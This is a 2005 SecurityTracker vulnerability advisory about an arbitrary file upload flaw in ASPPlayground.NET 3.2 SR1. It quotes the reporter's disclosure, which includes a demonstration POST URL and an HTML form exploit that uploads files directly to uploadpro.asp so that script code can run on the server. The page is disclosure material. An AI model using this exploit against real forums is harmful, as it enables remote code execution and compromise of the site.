SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  ASPPlayground.NET Vendors:  ASPPlayground.NET
ASPPlayground.NET Lets Remote Users Upload Arbitrary Files
SecurityTracker Alert ID:  1014309
SecurityTracker URL:  http://securitytracker.com/id?1014309
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 27 2005
Impact:  Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 3.2 SR1
Description:  Psycho from Team-evil moroccain hackers reported a vulnerability in ASPPlayground.NET. A remote user can upload arbitrary files.

A remote user can submit a POST request directly to the 'uploadpro.asp' script to upload files with arbitrary content to the target system.

A demonstration exploit POST action is provided:

http://[target]/[forum]/uploadpro.asp?memori=&deletefile=&mode=

A remote user can upload scripting code and then have the web server invoke the code.
Impact:  A remote user can upload arbitrary code to the target web server and then have the web server execute the code.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.aspplayground.net/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Windows (Any)
Reported By:  Psycho <l8oo8l@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Sat, 25 Jun 2005 13:42:55 +0000
From:  Psycho <l8oo8l@gmail.com>
Subject:  ASP Playground Version beta 3.2 SR1 - Arbitrary File Upload Vulnerability

 
 
 ASP Playground Version beta 3.2 SR1 - Arbitrary File Upload Vulnerability
 
 
 
ASP Playground allowing malicious users to
upload and execute arbitrary code by bypassing javascript filter.
 
 vulnerability has been identified in the message post whit upload
 
EXPLOITS :
 
http://www.target.comforum/uploadpro.asp?memori=&deletefile=&mode=
 
refer to
 
http://www.target.com/forum/post.asp 
 
* 
 
 ASP Playground html bug :
___________________________
 
 <html>
 <head>
 <title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files 
 </title>
 
</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">

<form method="POST" action="http://www.target.com/forum/uploadpro.asp?
 
memori=&deletefile=&mode=" enctype="multipart/form-data" 
 
onSubmit="return respondToUploader(this)">
  <tr>
	<td bgcolor="8d5a18">
	  <table width="100%" border="0" cellspacing="1" 
 
cellpadding="4">
		<tr>
		  <td bgcolor="f8fff3">
			  upload<br>
			  <input type="file" name="File1" size="22">
		  </td>
		</tr>
	  </table>
	</td>
  </tr>
  <tr>
    <td>
	  <hr size="1" noshade>
	</td>
  </tr>
  <tr>
      <td align="right">
		<input type="submit" name="submit" value="upload">
 
	  </td>
  </tr>
</form>
 
</table>
</body>
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
</html>
_______________________________________
 
by Team-evil moroccain hackers


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC